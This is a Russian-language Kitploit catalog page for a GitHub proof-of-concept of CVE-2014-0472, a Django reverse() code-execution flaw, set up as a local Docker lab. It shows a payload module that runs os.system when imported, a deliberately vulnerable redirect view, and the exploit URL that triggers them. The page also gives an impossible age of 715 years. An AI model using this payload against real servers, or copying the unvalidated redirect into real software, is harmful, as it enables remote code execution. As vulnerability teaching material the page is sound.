Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2014-0472 — CVE-2014-0472 Django неожиданное выполнение кода с использованием reverse() | Kitploit
Инструменты/GitHubGitHub/christasa/cve-2014-0472
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubchristasa/cve-2014-0472

CVE-2014-0472

CVE-2014-0472 Django неожиданное выполнение кода с использованием reverse()

Репозиторий
715 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2014-0472

Используйте

root@kitploit:~
docker-compose up -d

Доступ к localhost:8083

Ссылка: https://www.djangoproject.com/weblog/2014/apr/21/security/

  1. Присутствует одно или несколько представлений, которые конструируют URL на основе пользовательского ввода (обычно параметр "next" в строке запроса, указывающий, куда перенаправить после успешного завершения действия).
  2. Атакующему известно о существовании на сервере одного или нескольких модулей в пути импорта Python, которые при импорте выполняют код с побочными эффектами.

В tests.py

root@kitploit:~
def evil_function():
    print("exploit successful")
    os.system("echo > /tmp/`whoami` ")
    return os.getuid()


evil = evil_function()

В views.py

root@kitploit:~
def redirect_test(request):
        page = request.GET.get('page', None)
        if page is not None:
                redirect(page)
        return HttpResponse("OK")

Используйте функцию перенаправления для вызова вредоносной функции

avater

Используйте эксплойт

root@kitploit:~
http://your-ip:8083/example?page=app.tests.evil

avater

Эксплуатировано

avater

Скачать инструмент